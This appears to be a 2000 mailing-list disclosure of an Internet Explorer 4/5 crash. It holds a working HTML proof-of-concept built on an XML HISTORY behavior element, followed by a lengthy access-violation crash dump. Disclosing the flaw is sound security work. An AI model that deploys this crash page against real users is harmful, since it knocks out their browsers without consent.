--[Tuesday, March 21, 2000 by NtWaK0 /
biteraser]------------------------------
--[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY*
Object]---
--[Tested on Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too
?]-------
Here is the story, while having a chat (IRC) with biteraser today heh, he
suddenly said *fu*k* hrm... I said what is wrong
He said I JUST CRASHED IE..
After some investigation it turned about to be the *HISTORY* Object :).
So if you cut and past the html code in a file, then open it with IE, you
will
be able to see the crash.
Note: key line is: <HS:HISTORY ID="HS">, without it IEt won't crash and
behavior
should be #default. It can be exploited more.
--[SNIP]--------------------------------------------------------------------
---
<HTML>
<HEAD>
<Title>Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx</Title>
</HEAD>
<BODY>
<xml:namespace ns='CallFixPage' prefix='HS'>
<STYLE>
@media all{HS\:HISTORY {behavior:url(#default);}}
</STYLE>
<!--XML code -->
<HS:HISTORY ID="HS" />
<!-- End XML code -->
</BODY>
</HTML>
--[SNIP]--------------------------------------------------------------------
---
NOTE: Crash Memory dump.
Application exception occurred:
App: exe\iexplore.dbg (pid=219)
When: 3/21/2000 @ 12:52:24.60
Exception number: c0000005 (access violation)
*----> System Information <----*
Computer Name: INFOSEC-BRAIN
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 6 Stepping 10
Windows Version: 4.0
Current Build: 1381
Service Pack: 6
Current Type: Uniprocessor Free
Registered Organization: NtWaK0
Registered Owner: NtWaK0
(00400000 - 00412000) exe\iexplore.dbg
(77f60000 - 77fbe000) dll\ntdll.dbg
(77f00000 - 77f5e000) dll\kernel32.dbg
(77e70000 - 77ec5000) dll\user32.dbg
(77ed0000 - 77efc000) dll\gdi32.dbg
(77dc0000 - 77dff000) dll\advapi32.dbg
(77e10000 - 77e67000) dll\rpcrt4.dbg
(70bd0000 - 70c19000) SHLWAPI.dbg
(71500000 - 71610000) SHDOCVW.dbg
(00760000 - 007e9000) COMCTL32.dbg
(77c40000 - 77d7b000) dll\shell32.dbg
(71740000 - 71740000)
(22000000 - 22000000)
(77b20000 - 77bd7000) dll\ole32.dbg
(71050000 - 71118000) BROWSEUI.dbg
(717b0000 - 717b0000)
(779b0000 - 779b9000) dll\linkinfo.dbg
(77720000 - 77731000) dll\mpr.dbg
(77a40000 - 77a4d000) dll\ntshrui.dbg
(78000000 - 78040000)
(77800000 - 7783a000) dll\netapi32.dbg
(77840000 - 77849000) dll\NetRap.dbg
(777e0000 - 777ed000) dll\samlib.dbg
(65340000 - 653d2000) oleaut32.dbg
(70290000 - 702fe000) URLMON.dbg
(77a90000 - 77a9b000) dll\version.dbg
(779c0000 - 779c8000) dll\lz32.dbg
(77bf0000 - 77bf7000) dll\rpcltc1.dbg
(70410000 - 70492000) MLANG.dbg
(70000000 - 70242000) MSHTML.dbg
(01700000 - 01772000) WININET.dbg
(48080000 - 48080000)
(76ab0000 - 76ab5000) dll\imm32.dbg
(70f00000 - 70f1a000) dll\iepeers.dbg
State Dump for Thread Id 0xd2
eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000
edi=80004005
eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000202
function: Ordinal158
70bd180d 8b542408 mov edx,[esp+0x8]
ss:0129808f=????????
70bd1811 56 push esi
70bd1812 8b742408 mov esi,[esp+0x8]
ss:0129808f=????????
FAULT ->70bd1816 0fb706 movzx eax,word ptr [esi]
ds:00000000=????
70bd1819 46 inc esi
70bd181a 46 inc esi
70bd181b 83f841 cmp eax,0x41
70bd181e 7c05 jl Ordinal158+0x18 (70bd1825)
70bd1820 83f85a cmp eax,0x5a
70bd1823 7e1d jle Ordinal158+0x35 (70bd1842)
70bd1825 0fb70a movzx ecx,word ptr [edx]
ds:70f01ef4=0043
70bd1828 42 inc edx
70bd1829 42 inc edx
70bd182a 83f941 cmp ecx,0x41
70bd182d 7c05 jl Ordinal158+0x27 (70bd1834)
*----> Stack Back Trace <----*
FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
000696a4 700c8078 017d1e10 00000000 0009e4cc 012c5938 SHLWAPI!Ordinal158
000696cc 700c8014 017d1e10 00000000 012c5a34 012c5938 MSHTML!ShowModalDialog
000696f4 700c7f8e 00000000 012c5a34 012c5938 00069740 MSHTML!ShowModalDialog
00069718 700c7f05 00000000 012c5938 00069740 012c5930 MSHTML!ShowModalDialog
00069744 700c7e5d 00000000 012c59ec 0000c07c 0009c07c MSHTML!ShowModalDialog
00069b60 700c7b2f 012c5930 00000000 012c5904 012c5930 MSHTML!ShowModalDialog
00069b94 700add5d 012c5930 012c5904 00001000 012c3410 MSHTML!ShowModalDialog
0006dc58 700774db 012c3410 0006dc78 0009c070 0009bb60
MSHTML!DllGetClassObject
0006dc8c 7004723f 00000003 0006dccc 012c2600 0006dcd8
MSHTML!MatchExactGetIDsOfNames
00000000 00000000 00000000 00000000 00000000 00000000
MSHTML!MatchExactGetIDsOfNames
*----> Raw Stack Dump <----*
00069688 0d 18 bd 70 57 6d f0 70 - 00 00 00 00 f4 1e f0 70
...pWm.p.......p
00069698 68 c0 09 00 00 00 00 00 - 40 97 06 00 cc 96 06 00
h.......@.......
000696a8 78 80 0c 70 10 1e 7d 01 - 00 00 00 00 cc e4 09 00
x..p..}.........
000696b8 38 59 2c 01 40 97 06 00 - 10 1e 7d 01 cc e4 09 00
8Y,.@.....}.....
000696c8 00 00 00 00 f4 96 06 00 - 14 80 0c 70 10 1e 7d 01
...........p..}.
000696d8 00 00 00 00 34 5a 2c 01 - 38 59 2c 01 40 97 06 00
....4Z,.8Y,.@...
000696e8 40 97 06 00 ec 59 2c 01 - 05 40 00 80 18 97 06 00
@....Y,..@......
000696f8 8e 7f 0c 70 00 00 00 00 - 34 5a 2c 01 38 59 2c 01
...p....4Z,.8Y,.
00069708 40 97 06 00 30 59 2c 01 - 30 59 2c 01 60 bb 09 00
@...0Y,.0Y,.`...
00069718 44 97 06 00 05 7f 0c 70 - 00 00 00 00 38 59 2c 01
D......p....8Y,.
00069728 40 97 06 00 30 59 2c 01 - ec 59 2c 01 00 00 00 00
@...0Y,..Y,.....
00069738 10 34 2c 01 00 20 0c 70 - 00 00 00 00 60 9b 06 00 .4,..
.p....`...
00069748 5d 7e 0c 70 00 00 00 00 - ec 59 2c 01 7c c0 00
0 ]~.p.....Y,.|...
00069758 7c c0 09 00 00 00 00 00 - 00 00 5c 00 43 00 72 00
|.........\.C.r.
00069768 61 00 73 00 68 00 5f 00 - 41 00 4c 00 4c 00 5f 00
a.s.h._.A.L.L._.
00069778 49 00 45 00 34 00 5f 00 - 49 00 45 00 35 00 5f 00
I.E.4._.I.E.5._.
00069788 6f 00 6e 00 5f 00 57 00 - 69 00 6e 00 64 00 6f 00
o.n._.W.i.n.d.o.
00069798 77 00 73 00 5f 00 39 00 - 78 00 5f 00 61 00 6e 00
w.s._.9.x._.a.n.
000697a8 64 00 5f 00 41 00 6c 00 - 6c 00 5f 00 4e 00 54 00
d._.A.l.l._.N.T.
000697b8 5f 00 53 00 50 00 78 00 - 5f 00 77 00 69 00 74 00
_.S.P.x._.w.i.t.
State Dump for Thread Id 0xc6
eax=7ffdd000 ebx=00000000 ecx=00000001 edx=00000000 esi=00074a30
edi=000872e8
eip=77f67fa7 esp=0084fdf0 ebp=0084ff90 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000206
function: ZwReplyWaitReceivePort
77f67f9c b890000000 mov eax,0x90
77f67fa1 8d542404 lea edx,[esp+0x4]
ss:01a7e7f7=????????
77f67fa5 cd2e int 2e
77f67fa7 c21000 ret 0x10
77f67faa 8bc0 mov eax,eax
*----> Stack Back Trace <----*
FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
0084ff90 77e15a1d 77e160f7 00074a30 0084ffec ffffffff
ntdll!ZwReplyWaitReceivePort
00003a98 00000000 00000000 00000000 00000000 00000000 rpcrt4!NdrOleAllocate
State Dump for Thread Id 0xee
eax=77b20000 ebx=00000000 ecx=0008a2e8 edx=00000000 esi=0126ff7c
edi=0008a2ec
eip=77f6791f esp=0126ff68 ebp=0126ff84 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000202
function: NtDelayExecution
77f67914 b827000000 mov eax,0x27
77f67919 8d542404 lea edx,[esp+0x4]
ss:0249e96f=????????
77f6791d cd2e int 2e
77f6791f c20800 ret 0x8
77f67922 8bc0 mov eax,eax
*----> Stack Back Trace <----*
FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
0126ff84 77f1cebe 0000ea60 00000000 77b489f4 0000ea60 ntdll!NtDelayExecution
0126ffec 00000000 77b4f66d 0008a2e8 00000000 00000000 kernel32!Sleep
00000000 00000000 00000000 00000000 00000000 00000000 iexplore!<nosymbols>
*----> Raw Stack Dump <----*
0126ff68 f5 ce f1 77 00 00 00 00 - 7c ff 26 01 e8 a2 08 00
...w....|.&.....
0126ff78 00 00 00 00 00 ba 3c dc - ff ff ff ff ec ff 26 01
......<.......&.
0126ff88 be ce f1 77 60 ea 00 00 - 00 00 00 00 f4 89 b4 77
...w`..........w
0126ff98 60 ea 00 00 e9 f5 b4 77 - 00 00 00 00 00 00 b2 77
`......w.......w
0126ffa8 e8 a2 08 00 e8 a2 08 00 - 87 f6 b4 77 18 00 14 02
...........w....
0126ffb8 40 d4 06 00 de 4e f0 77 - e8 a2 08 00 18 00 14 02
@....N.w........
0126ffc8 40 d4 06 00 e8 a2 08 00 - 40 d4 06 00 c4 ff 26 01
@.......@.....&.
0126ffd8 00 02 00 00 ff ff ff ff - 44 b9 f3 77 38 d2 f3 77
........D..w8..w
0126ffe8 00 00 00 00 00 00 00 00 - 00 00 00 00 6d f6 b4 77
............m..w
0126fff8 e8 a2 08 00 00 00 00 00 - 00 00 00 00 02 00 00 00
................
01270008 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270018 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270028 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270038 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270048 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270058 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270068 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270078 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270088 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270098 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
State Dump for Thread Id 0xec
eax=00000010 ebx=00000000 ecx=012c2200 edx=00000000 esi=000000a4
edi=016fff78
eip=77f682db esp=016fff5c ebp=016fff80 iopl=0 ov up ei pl nz na po
cy
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000a07
function: NtWaitForSingleObject
77f682d0 b8c5000000 mov eax,0xc5
77f682d5 8d542404 lea edx,[esp+0x4]
ss:0292e963=????????
77f682d9 cd2e int 2e
77f682db c20c00 ret 0xc
77f682de 8bc0 mov eax,eax
*----> Stack Back Trace <----*
FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
016fff80 77f04f37 000000a4 000927c0 00000000 700dcbbc
ntdll!NtWaitForSingleObject
77f67610 4affc033 89257508 ff900c42 037d044a 520004c2
kernel32!WaitForSingleObject
*----> Raw Stack Dump <----*
016fff5c a0 cc f1 77 a4 00 00 00 - 00 00 00 00 78 ff 6f 01
...w........x.o.
016fff6c 00 00 00 00 10 24 2c 01 - 40 75 f6 77 00 44 5f 9a
.....$,.@u.w.D_.
016fff7c fe ff ff ff 10 76 f6 77 - 37 4f f0 77 a4 00 00 00
.....v.w7O.w....
016fff8c c0 27 09 00 00 00 00 00 - bc cb 0d 70 a4 00 00 00
.'.........p....
016fff9c c0 27 09 00 d4 2c f9 77 - 10 24 2c 01 ec ff 6f 01
.'...,.w.$,...o.
016fffac 10 24 2c 01 ed ca 0d 70 - 50 d3 f9 77 c7 ca 0d 70
.$,....pP..w...p
016fffbc de 4e f0 77 10 24 2c 01 - d4 2c f9 77 50 d3 f9 77
.N.w.$,..,.wP..w
016fffcc 10 24 2c 01 50 d3 f9 77 - c4 ff 6f 01 54 1a 06 00
.$,.P..w..o.T...
016fffdc ff ff ff ff 44 b9 f3 77 - 38 d2 f3 77 00 00 00 00
....D..w8..w....
016fffec 00 00 00 00 00 00 00 00 - be ca 0d 70 10 24 2c 01
...........p.$,.
016ffffc 00 00 00 00 4d 5a 90 00 - 03 00 00 00 04 00 00 00
....MZ..........
0170000c ff ff 00 00 b8 00 00 00 - 00 00 00 00 40 00 00 00
............@...
0170001c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
0170002c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
0170003c c0 00 00 00 0e 1f ba 0e - 00 b4 09 cd 21 b8 01 4c
............!..L
0170004c cd 21 54 68 69 73 20 70 - 72 6f 67 72 61 6d 20 63 .!This program
c
0170005c 61 6e 6e 6f 74 20 62 65 - 20 72 75 6e 20 69 6e 20 annot be run in
0170006c 44 4f 53 20 6d 6f 64 65 - 2e 0d 0d 0a 24 00 00 00 DOS
mode....$...
0170007c 00 00 00 00 63 c9 86 b7 - 27 a8 e8 e4 27 a8 e8 e4
....c...'...'...
0170008c 27 a8 e8 e4 27 a8 e9 e4 - cb a8 e8 e4 7e 8b fb e4
'...'.......~...
--[END]---------------------------------------------------------------------
---
Cheers,
|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)
Cheers,
------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
-----------------------------------------------------------------
Live Well Do Good --:)